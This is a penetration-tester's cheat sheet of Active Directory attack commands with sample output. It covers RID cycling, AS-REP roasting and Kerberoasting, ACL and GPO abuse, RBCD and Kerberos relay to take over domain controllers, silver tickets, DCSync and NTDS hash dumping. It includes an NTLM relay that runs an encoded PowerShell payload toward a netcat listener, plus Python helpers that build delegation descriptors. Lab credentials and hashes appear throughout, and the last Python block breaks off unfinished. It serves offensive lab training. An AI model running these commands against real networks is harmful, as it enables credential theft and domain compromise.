linux
NTP
#update time
ntpdate IP_DC
rdate -n IP_DC
ntpdate -v pool.ntp.org
NetBIOS - 137/139
query the NetBIOS name service (UDP 137) for valid names
sudo nbtscan -r 192.168.50.0/24
Doing NBT name scan for addresses from 192.168.50.0/24
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.50.124 SAMBA <server> SAMBA 00:00:00:00:00:00
192.168.50.134 SAMBAWEB <server> SAMBAWEB 00:00:00:00:00:00
...
SMB - 445
Shares
smbmap
list a share recursively (here docshare) down to the given depth
smbmap -u stephanie -p 'LegmanTeamBenzoin!!' -d corp.com -H 192.168.153.73 -r docshare --depth 5
crackmapexec
list the directory tree of every readable share recursively (spider_plus module)
crackmapexec smb 10.10.176.146 -u sql_svc -p Dolphin1 -M spider_plus
Smbclient
#-------------------------------null session
#download all directories and files recursively
smbclient //192.168.45.20/share -c 'prompt; recurse; mget *' -N
#--------------------------------authenticated
#authenticate with domain creds
smbclient //192.168.50.21/shares -U domain.local/user --password='test'
#authenticate by passing the hash
smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
RID Cycling attack
enumerate domain users over a null/guest session by cycling RIDs (LSARPC LookupSids), no valid credentials needed
nxc
netexec smb 10.10.11.231 -u guest -p '' --rid-brute
SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest:
SMB 10.10.11.231 445 DC01 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 500: rebound\Administrator (SidTypeUser)
SMB 10.10.11.231 445 DC01 501: rebound\Guest (SidTypeUser)
SMB 10.10.11.231 445 DC01 502: rebound\krbtgt (SidTypeUser)
By default, typical RID cycle attacks go up to RID 4000. For a larger domain it may be necessary to expand that, so switch to lookupsid.py (netexec works as well if you pass the maximum RID to the option, e.g. --rid-brute 10000).
lookupsid
lookupsid.py -no-pass 'guest@rebound.htb' 20000
Impacket v0.10.1.dev1+20230608.100331.efc6a1c3 - Copyright 2022 Fortra
[*] Brute forcing SIDs at rebound.htb
[*] StringBinding ncacn_np:rebound.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: rebound\Administrator (SidTypeUser)
501: rebound\Guest (SidTypeUser)
502: rebound\krbtgt (SidTypeUser)
same command, but keep only user accounts and write the bare sAMAccountNames to a file
lookupsid.py -no-pass 'guest@rebound.htb' 8000 | grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tee users
#variant with -domain-sids; note that awk 'NR >= 29' only skips the banner/header lines (fragile) and keeps groups and aliases as well as users
impacket-lookupsid -domain-sids -no-pass -target-ip 10.10.103.169 phantom.vl/'daz'@10.10.103.169 | cut -d '\' -f 2 | awk 'NR >= 29 {print $1}' > full_ul.txt
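The grep/cut/awk pipelines above depend on column positions and on the exact number of banner lines. As an added example, not part of the original notes, here is a small Python parser for lookupsid.py / netexec --rid-brute output that keeps only SidTypeUser entries and also captures the domain SID. The sample text embedded in it is constructed from the output lines shown above.

```python
import re
import sys

# Matches one result line from lookupsid.py or "netexec smb --rid-brute", e.g.
#   500: rebound\Administrator (SidTypeUser)
#   SMB 10.10.11.231 445 DC01 500: rebound\Administrator (SidTypeUser)
# The optional "domain\" prefix is dropped; names may contain spaces.
_RID_LINE = re.compile(r'(\d+):\s+(?:[^\\\s]+\\)?(.+?)\s+\((SidType\w+)\)\s*$')
_DOMAIN_SID = re.compile(r'Domain SID is:\s+(S-1-5-21-\d+-\d+-\d+)')

# Constructed sample, assembled from the output lines shown above on this page.
SAMPLE_OUTPUT = r"""
[*] Brute forcing SIDs at rebound.htb
[*] StringBinding ncacn_np:rebound.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: rebound\Administrator (SidTypeUser)
501: rebound\Guest (SidTypeUser)
502: rebound\krbtgt (SidTypeUser)
SMB 10.10.11.231 445 DC01 500: rebound\Administrator (SidTypeUser)
"""


def parse_rid_cycle(output):
    """Split RID-cycling output into the domain SID and (rid, name) lists by SID type."""
    result = {'domain_sid': None, 'users': [], 'groups': [], 'other': []}
    for line in output.splitlines():
        m = _DOMAIN_SID.search(line)
        if m:
            result['domain_sid'] = m.group(1)
            continue
        m = _RID_LINE.search(line)
        if not m:
            continue
        rid, name, sid_type = int(m.group(1)), m.group(2), m.group(3)
        bucket = {'SidTypeUser': 'users', 'SidTypeGroup': 'groups',
                  'SidTypeAlias': 'groups'}.get(sid_type, 'other')
        result[bucket].append((rid, name))
    return result


def user_names(output):
    """Bare sAMAccountNames for a spray / AS-REP roast list, deduplicated, input order kept."""
    seen, names = set(), []
    for _, name in parse_rid_cycle(output)['users']:
        if name not in seen:
            seen.add(name)
            names.append(name)
    return names


if __name__ == '__main__':
    # usage: lookupsid.py -no-pass 'guest@rebound.htb' 20000 | python3 rid_users.py > users
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_OUTPUT
    print('\n'.join(user_names(text)))
```

Feed it the raw tool output on stdin; it works unchanged on netexec lines because the regex ignores the "SMB ip port host" prefix.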
Execute commands
crackmapexec
execute commands
crackmapexec smb 10.10.176.148 -u sql_svc -p Dolphin1 -x "whoami"
change user password
Smbpasswd
resetting an expired password remotely
smbpasswd -r 10.10.88.63 -U "Caroline.Robinson"
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user Caroline.Robinson
Kerberos - 88
Enumerate users
kerbrute
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
AS-REP Roasting
GetNPUsers
impacket-GetNPUsers -usersfile users rebound.htb/ -dc-ip 10.10.11.231
netexec
netexec ldap 10.10.11.231 -u users -p '' --asreproast asrephashes.txt
SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.231 445 DC01 [email protected]:878af35ccf86b307eeddf59c....
Kerberoasting
GetUserSPNs
impacket-GetUserSPNs test.local/john:password123 -dc-ip 10.10.10.1 -request -outputfile sqldev_tgs
ACLs
Enumerating ACLs and GPO
powerview
Get-ObjectACL -SamAccountName "engineering" -ResolveGUIDs

(the output, not reproduced here, showed that mayrosec/Sales has GenericAll over the Engineering users)
#convert a user name to its SID
$sid=Convert-NameToSid "Hacker_user"
=> suppose this user is expected to have rights over a GPO and we want to find which GPO ACEs name him
#enumerate GPO ACEs held by that SID
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
=> then use BloodHound to see which OU/objects that GPO is linked to
Force Change password
powerview
#login as user support
powerview blackfield.local/support:'passwordHere'@10.10.10.192 --dc-ip 10.10.10.192 -d --use-ldap
#changing password of user AUDIT2020
(LDAP)-[DC01.BLACKFIELD.local]-[BLACKFIELD\support]
PV > Set-DomainUserPassword -Identity AUDIT2020 -AccountPassword "passwordHere"
rpcclient
rpcclient -U blackfield/support 10.10.10.192
#setuserinfo <user> 23 <newpassword>: information level 23 sets the password
rpcclient $> setuserinfo audit2020 23 H@CKTHEB0X#
WriteOwner
powerview
#abuse WriteOwner: make tom the owner of claire's object (the owner can then rewrite its DACL)
Set-DomainObjectOwner -TargetIdentity claire -PrincipalIdentity tom
#grant tom the ResetPassword (User-Force-Change-Password) right on claire
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
#reset claire's password (PowerView's -AccountPassword takes a SecureString)
$pw = ConvertTo-SecureString '1ts-mag1c!!' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $pw
WriteDacl
powerview
abusing WriteDacl
to add users to a group
#abuse WriteDacl on the group: grant claire the WriteMembers right on BACKUP_ADMINS
Add-DomainObjectAcl -TargetIdentity "BACKUP_ADMINS" -Rights WriteMembers -PrincipalIdentity claire
#add user tom to the BACKUP_ADMINS group
Add-DomainGroupMember -Identity 'BACKUP_ADMINS' -Members 'tom'
#check that tom was added
Get-DomainGroupMember -Identity 'BACKUP_ADMINS'
abusing WriteDacl
to change a password
#grant claire all rights on the target object (for a password reset -TargetIdentity must be the account whose password is changed next, i.e. GPOADM here; the group name is carried over from the example above)
Add-DomainObjectAcl -TargetIdentity "BACKUP_ADMINS" -Rights All -PrincipalIdentity claire
#change the password (SecureString)
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity GPOADM -AccountPassword $UserPassword
GenericAll
over a machine account (abused via RBCD; the original illustrated the BloodHound edge with an image that is not reproduced here)

create a new computer in the domain
impacket-addcomputer resourced.local/l.livingstone -dc-ip 192.168.167.175 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'ATTACK$' -computer-pass 'AttackerPC1!'
Verify if the new machine has been created or not
get-adcomputer attack
add msDS-AllowedToActOnBehalfOfOtherIdentity
impacket-rbcd -action write -delegate-to "RESOURCEDC$" -delegate-from "ATTACK$" -dc-ip 192.168.231.175 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced.local/l.livingstone
confirm if the property has been added
Get-ADComputer resourcedc -Properties msDS-AllowedToActOnBehalfOfOtherIdentity | Select -ExpandProperty msDS-AllowedToActOnBehalfOfOtherIdentity
get the administrator ticket
impacket-getST -spn 'cifs/resourcedc.resourced.local' -impersonate 'Administrator' 'resourced.local/ATTACK$:AttackerPC1!'
#use the forged service ticket (the file name is whatever getST reported saving)
export KRB5CCNAME=./Administrator.ccache
#authenticate with the ticket
sudo impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.167.175
#dumping ntds
impacket-secretsdump -k -no-pass resourcedc.resourced.local -dc-ip 192.168.231.175
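To see what `rbcd -action write` actually stores in msDS-AllowedToActOnBehalfOfOtherIdentity, and what the Get-ADComputer check above returns, here is an added example (my code, not Impacket's and not part of the original notes) that builds the attribute value as a self-relative security descriptor with a full-control ACE for the attacker's SID and parses one back. The SID in the usage block is the one rbcd.py prints further down this page; the owner/group SID (Builtin Administrators) and the 0xF01FF mask are what impacket's rbcd.py writes.

```python
import base64
import struct

# Access mask impacket's rbcd.py writes for the delegate-from account:
# CC DC LC SW RP WP DT LO CR SD RC WD WO, i.e. full control (0xF01FF).
FULL_CONTROL = 0x000F01FF
BUILTIN_ADMINS = 'S-1-5-32-544'       # owner and primary group of the descriptor
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000


def sid_to_bytes(sid):
    """'S-1-5-21-...' -> binary SID (revision, sub-authority count, 48-bit BE authority, LE sub-authorities)."""
    parts = sid.split('-')
    if parts[0] != 'S' or parts[1] != '1':
        raise ValueError('not a SID string: %r' % sid)
    subs = [int(p) for p in parts[3:]]
    return (struct.pack('<BB', 1, len(subs)) + int(parts[2]).to_bytes(6, 'big')
            + struct.pack('<%dI' % len(subs), *subs))


def sid_from_bytes(buf, off=0):
    """Binary SID at buf[off:] -> (sid string, size in bytes)."""
    rev, count = struct.unpack_from('<BB', buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], 'big')
    subs = struct.unpack_from('<%dI' % count, buf, off + 8)
    return 'S-%d-%d-%s' % (rev, authority, '-'.join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_sd(sids):
    """Self-relative security descriptor with one ACCESS_ALLOWED full-control ACE per SID."""
    sids = list(sids)
    aces = b''
    for sid in sids:
        s = sid_to_bytes(sid)
        # ACE_HEADER (type 0 = ACCESS_ALLOWED_ACE, flags, size) + Mask + SID
        aces += struct.pack('<BBHI', 0, 0, 8 + len(s), FULL_CONTROL) + s
    # ACL header: AclRevision 4 (ACL_REVISION_DS), Sbz1, AclSize, AceCount, Sbz2
    dacl = struct.pack('<BBHHH', 4, 0, 8 + len(aces), len(sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    owner_off = 20                            # SECURITY_DESCRIPTOR_RELATIVE header is 20 bytes
    group_off = owner_off + len(owner)
    dacl_off = group_off + len(owner)
    header = struct.pack('<BBHIIII', 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, group_off, 0, dacl_off)   # no SACL
    return header + owner + owner + dacl


def parse_rbcd_sd(buf):
    """Return [(sid, mask)] for each ACCESS_ALLOWED ACE in the DACL: the accounts allowed to act."""
    _, _, control, _, _, _, dacl_off = struct.unpack_from('<BBHIIII', buf, 0)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from('<BBHHH', buf, dacl_off)
    off, allowed = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from('<BBH', buf, off)
        if ace_type == 0:
            mask, = struct.unpack_from('<I', buf, off + 4)
            allowed.append((sid_from_bytes(buf, off + 8)[0], mask))
        off += ace_size
    return allowed


def to_ldif(sd):
    """Base64 as ldapmodify/ldapsearch show the binary attribute ('attr:: <b64>')."""
    return base64.b64encode(sd).decode()


def allowed_from_ldif(b64):
    """Decode the base64 attribute value (e.g. from an LDAP dump) and list the allowed SIDs."""
    return parse_rbcd_sd(base64.b64decode(b64))


if __name__ == '__main__':
    # SID printed by rbcd.py further down this page, used as the delegate-from account
    sd = build_rbcd_sd(['S-1-5-21-4029599044-1972224926-2225194048-1126'])
    print('msDS-AllowedToActOnBehalfOfOtherIdentity::', to_ldif(sd))
    print(parse_rbcd_sd(sd))
```

The base64 string is what you would put in an ldapmodify LDIF (`msDS-AllowedToActOnBehalfOfOtherIdentity:: <b64>`) when rbcd.py is not available, and `allowed_from_ldif` turns a dumped value back into SIDs to confirm who may delegate.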
AllowedToActOnBehalfOfOtherIdentity

check the MachineAccountQuota (MAQ)
value to see whether we can create a machine account in the domain (a value of 0, as below, means we cannot, which is why the SPN-less user variant follows)
crackmapexec ldap 10.10.103.169 -u crose -p 'Password123@' -M maq
SMB 10.10.103.169 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP 10.10.103.169 389 DC [+] phantom.vl\crose:Password123@
MAQ 10.10.103.169 389 DC [*] Getting the MachineAccountQuota
MAQ 10.10.103.169 389 DC MachineAccountQuota: 0
RBCD Through SPN-less User
So to start, we’ll get the current TGT of the user in order to discover the ticket session key.
impacket-getTGT -hashes :$(pypykatz crypto nt 'Password123@') phantom.vl/crose
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Saving ticket in crose.ccache
We can then use describeTicket.py to read the session key of that TGT.
python3 describeTicket.py crose.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key : 4abd87ab347a96df9a497689a79bfd5c
Now set the user's NT hash to the TGT session key (this changes the account's password; its cleartext is no longer known).
impacket-smbpasswd -newhashes :4abd87ab347a96df9a497689a79bfd5c phantom.vl/crose:'Password123@'@dc.phantom.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
===============================================================================
Warning: This functionality will be deprecated in the next Impacket version
===============================================================================
[*] NTLM hashes were changed successfully.
Now that the account's NT hash equals the TGT session key, RBCD can be used as intended.
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip 10.10.103.169 -action 'write' 'phantom.vl'/'crose' -hashes :4abd87ab347a96df9a497689a79bfd5c
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] crose (S-1-5-21-4029599044-1972224926-2225194048-1126)
Now that the account is allowed to delegate to the DC, request a service ticket as usual with our controlled user. The difference is the -u2u option: the S4U2self request is made user-to-user, so the resulting ticket is encrypted under our TGT session key rather than under a service key the SPN-less account does not have; because the account's NT hash now equals that session key, the KDC can validate the ticket during S4U2proxy. We impersonate Administrator so that we can dump the domain controller's secrets.
export KRB5CCNAME=crose.ccache
impacket-getST -u2u -impersonate Administrator -spn 'cifs/dc.phantom.vl' -k -no-pass phantom.vl/'crose'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
dump NTDS
export KRB5CCNAME=Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
impacket-secretsdump -k dc.phantom.vl
......
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[...snip...]:::
Recycle Bin Group Abuse
#filter deleted objects only, using the isDeleted attribute
Get-ADObject -ldapfilter "(&(isDeleted=TRUE))" -IncludeDeletedObjects
#restrict to user accounts with objectclass
Get-ADObject -ldapfilter "(&(objectclass=user)(isDeleted=TRUE))" -IncludeDeletedObjects
#select one account and show all of its properties
Get-ADObject -ldapfilter "(&(objectclass=user)(DisplayName=TempAdmin)(isDeleted=TRUE))" -IncludeDeletedObjects -Properties *
#retrieve every deleted object (groups, users, ...) except the Deleted Objects container itself
Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
#restore a deleted object under a new CN; the sAMAccountName stays the same
restore-adobject -identity <ObjectGUID> -newname liza.deleted
GenericWrite
#authenticate
python3 /opt/powerview.py/powerview.py MEGACORP/sbauer:'D3veL0pM3nT!'@10.10.10.179 --dc-ip 10.10.10.179 -d --use-ldap
#targeted Kerberoast: GenericWrite lets us write an SPN onto user jorden, request a TGS for it and crack it offline
Set-DomainObject -Identity "JORDEN" -Set "serviceprincipalname=http/BLAHBLAH"
#or let targetedKerberoast.py add a temporary SPN, fetch the hash and remove the SPN again
python3 targetedKerberoast.py -v -d 'MEGACORP.LOCAL' -u 'sbauer' -p 'D3veL0pM3nT!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (jorden)
[+] Printing hash for (jorden)
LAPS
ldapsearch
ldapsearch -v -c -D fmcsorley@hutch.offsec -w CrabSharkJellyfish192 -b "DC=hutch,DC=offsec" -H ldap://$IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
Constrained delegation
find delegation using impacket-findDelegation
impacket-findDelegation 'rebound.htb/delegator$' -dc-ip 10.10.11.231 -k -hashes :43e9069a73081ecfcbe1514e1d4e3bc8
Impacket v0.12.0.dev1+20240308.164415.4a62f39 - Copyright 2023 Fortra
[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName AccountType DelegationType DelegationRightsTo
----------- ----------------------------------- -------------- --------------------
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb
abusing delegation to get TGS ticket by impersonating the administrator
getST.py -spn http/dc01.rebound.htb -impersonate TARGET_USER DOMAIN/USERNAME:PASSWORD
Without protocol transition (Kerberos-only constrained delegation), the KDC only honours S4U2proxy when we present a service ticket that the impersonated user actually obtained for our service, so this cannot be abused just by requesting a ticket with getST from Impacket; once such a ticket is obtained it is supplied to getST with -additional-ticket.
Abusing GPOs
suppose we have WriteDacl on the Default Domain Policy GPO (the original showed the BloodHound edge in an image that is not reproduced here)

using SharpGPOAbuse
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount charlotte --GPOName "DEFAULT DOMAIN POLICY"
[+] Domain = secura.yzx
[+] Domain Controller = dc01.secura.yzx
[+] Distinguished Name = CN=Policies,CN=System,DC=secura,DC=yzx
[+] SID Value of charlotte = S-1-5-21-3453094141-4163309614-2941200192-1104
[+] GUID of "DEFAULT DOMAIN POLICY" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\secura.yzx\SysVol\secura.yzx\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
#force the policy refresh on the target host
gpupdate /force
using pygpoabuse
python3 pygpoabuse.py baby2.vl/GPOADM:'Password123!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -command 'net localgroup administrators GPOADM /add' -f
Password spraying
crackmapexec
using a username file and a password file (every combination; --continue-on-success keeps going after a hit)
crackmapexec smb 10.10.10.10 -u ./users.txt -p ./passwords.txt --continue-on-success
username-as-password (--no-bruteforce pairs line i of -u with line i of -p instead of trying every combination)
crackmapexec smb 10.10.10.10 -u ./users.txt -p ./users.txt --continue-on-success --no-bruteforce
Relaying Net-NTLMv2
running ntlmrelayx
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
...
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
and running nc
kali@kali:~$ nc -nvlp 8080
listening on [any] 8080 ...
trigger the relay from the foothold host: accessing a UNC path on our relay host makes it authenticate to us
C:\Windows\system32>whoami
whoami
files01\files02admin
C:\Windows\system32>dir \\192.168.119.2\test
...

However, we get an rpc access denied error and code execution fails, because the svc_web_staging user is not a local administrator on the target host. Even without code execution, we can still access the SMB shares on dc01 in the context of svc_web_staging.
impacket-ntlmrelayx --no-http-server -smb2support -t dc01.reflection.vl -i

=> ntlmrelayx keeps the relayed SMB session open and exposes an interactive client on 127.0.0.1:11000 (connect with nc).
In the share there is a file that looks like a configuration for the production database.

Silver Tickets
generate the NT hash of the service account's password (the original linked an online tool; pypykatz crypto nt '<password>' does it offline)
getting the SID (Get-LocalUser only returns a local account's SID; the silver ticket needs the domain SID, i.e. a domain account's SID without its last RID component)
Get-LocalUser -Name $env:USERNAME | Select sid
enumerate the domain SID
nxc ldap <ip> -u <user> -p <pass> --get-sid
rpcclient -U htb.local\\james%'J@m3s_P@ssW0rd!' 10.10.10.52
rpcclient $> lookupnames james
usage of impacket ticketer tool
ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
#generating the silver ticket
impacket-ticketer -nthash 1443EC19DA4DAC4FFC953BCA1B57B4CF -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -dc-ip dc.sequel.htb -spn nonexistent/DC.SEQUEL.HTB Administrator
export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient -k dc.sequel.htb
DCSync
impacket-secretsdump (DCSync over DRSUAPI; requires replication rights on the domain object)
impacket-secretsdump -outputfile ntds_hashes htb.local/baiz:'Password123!'@10.10.10.161
Kerberos Relay
first check the MAQ: svc_scan has a MachineAccountQuota of 10, so it can create a machine account in the domain
nxc ldap 10.10.73.8 -u 'svc_scan' -p 'pass' -M maq
SMB 10.10.73.8 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.73.8 389 BRUNODC [+] bruno.vl\svc_scan:[...snip...]
MAQ 10.10.73.8 389 BRUNODC [*] Getting the MachineAccountQuota
MAQ 10.10.73.8 389 BRUNODC MachineAccountQuota: 10
Furthermore, the LDAP does not have signing enabled. This cements the fact that a Kerberos relay attack is possible through KrbRelayUp.
nxc ldap 10.10.73.8 -u 'svc_scan' -p '[...snip...]' -M ldap-checker
SMB 10.10.73.8 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.73.8 389 BRUNODC [+] bruno.vl\svc_scan:[...snip...]
LDAP-CHE... 10.10.73.8 389 BRUNODC LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.73.8 389 BRUNODC LDAPS Channel Binding is set to "NEVER"
A Kerberos relay attack is, like NTLM relay, an authentication relay: a domain object's Kerberos authentication (the AP-REQ) is relayed to another service, here LDAP on the DC, to write RBCD rights for our machine account. LDAP signing matters because a signed LDAP session needs the session key from the ticket, which the relayer never has; with signing not enforced, the relayed unsigned bind is accepted.
In particular, the CLSID used was d99e6e73-fc88-11d0-b498-00a0c90312f3. KrbRelayUp has to be compiled and run on the target machine; Defender is not enabled on this box, so no AV bypass is needed.
#quick Defender check: typing the string "Invoke-Mimikatz" into PowerShell gets blocked by AMSI when Defender is active; here it just echoes back
PS C:\temp> "Invoke-Mimikatz"
Invoke-Mimikatz
So once we have the KrbRelayUp
binary compiled, we’ll execute it on the target machine using the CLSID that we have selected.
PS C:\temp> .\KrbRelayUp.exe relay -Domain bruno.vl -CreateNewComputerAccount -ComputerName daz$ -ComputerPassword Password123@ --clsid d99e6e73-fc88-11d0-b498-00a0c90312f3
KrbRelayUp - Relaying you to SYSTEM
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Computer account "daz$" added with password "Password123@"
[+] Looking for available ports..
[+] Port 2869 available
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] Run the spawn method for SYSTEM shell:
./KrbRelayUp.exe spawn -m rbcd -d bruno.vl -dc brunodc.bruno.vl -cn daz$ -cp Password123@
We’ll then execute the command provided so that a TGT request can be sent to the KDC. This allows us to use getST
after this command to retrieve a TGS on behalf of the Administrator account to CIFS using our fake machine account.
impacket-getST -spn cifs/brunodc.bruno.vl -impersonate Administrator -dc-ip 10.10.116.111 bruno.vl/'daz$':'Password123@'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_brunodc.bruno.vl@BRUNO.VL.ccache
using secrets dump
export KRB5CCNAME=Administrator@cifs_brunodc.bruno.vl@BRUNO.VL.ccache
impacket-secretsdump -k brunodc.bruno.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf58ac639976f0c99c2dde0d24ef3219d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
......
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735[...snip...]bfd4:::
Dumping NTDS
dumping ntds using kerberos ticket
export KRB5CCNAME=./Administrator.ccache
impacket-secretsdump -k -no-pass resourcedc.resourced.local -dc-ip 192.168.231.175
dumping NTDS locally from an extracted ntds.dit and SYSTEM hive
impacket-secretsdump -ntds /root/ntds.dit -system /root/SYSTEM LOCAL
Ldap - 389/636
Powerview
authenticate using valid creds
powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb
PV >
=> if the NTLM bind fails with invalidCredentials [ERROR_ACCOUNT_LOCKED_OUT], retry with Kerberos using the -k option
powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb -k
[2024-03-19 01:07:37] LDAP Signing NOT Enforced! (LDAPS)-[rebound.htb]-[rebound\oorend]
PV >
Enumerate ACL
PV > Get-DomainObjectAcl -Identity ServiceMGMT
...[snip]...
ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Self
AccessMask : 0x8
InheritanceType : None
SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682) ...[snip]...
filter the ACEs on an object to those whose trustee is a given principal (here: what oorend holds over winrm_svc)
Get-DomainObjectAcl -Identity winrm_svc -Where "SecurityIdentifier contains oorend"
Add user to a group
PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
[2024-03-19 01:20:23] User oorend successfully added to servicemgmt
verify user was add to group
Get-DomainGroupMember -Identity servicemgmt
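The AccessMask in the Get-DomainObjectAcl output above (0x8, printed as Self, on ServiceMgmt) is what lets oorend add itself to the group in the step just shown; the same decoding applies to the Get-ObjectACL enumeration in the ACLs section earlier on this page. As an added example (my code, not PowerView's and not part of the original notes), this decodes AD access masks into the names PowerView prints and maps an ACE plus its ObjectAceType GUID onto the abuse primitives used across this page (AddSelf, ForceChangePassword, WriteDacl, WriteOwner, AddAllowedToAct, the DCSync replication rights). The GUIDs are the well-known schema and extended-right GUIDs; the sample ACE text is constructed from the output above.

```python
# Access-mask bits for AD objects (ADS_RIGHT_* / .NET ActiveDirectoryRights), lowest bit first.
RIGHTS = [
    (0x00000001, 'CreateChild'), (0x00000002, 'DeleteChild'), (0x00000004, 'ListChildren'),
    (0x00000008, 'Self'), (0x00000010, 'ReadProperty'), (0x00000020, 'WriteProperty'),
    (0x00000040, 'DeleteTree'), (0x00000080, 'ListObject'), (0x00000100, 'ExtendedRight'),
    (0x00010000, 'Delete'), (0x00020000, 'ReadControl'), (0x00040000, 'WriteDacl'),
    (0x00080000, 'WriteOwner'), (0x10000000, 'GenericAll'), (0x20000000, 'GenericExecute'),
    (0x40000000, 'GenericWrite'), (0x80000000, 'GenericRead'),
]
GENERIC_ALL_MAPPED = 0x000F01FF    # specific-rights combination PowerView prints as GenericAll
GENERIC_WRITE_MAPPED = 0x00000028  # Self | WriteProperty, printed as GenericWrite

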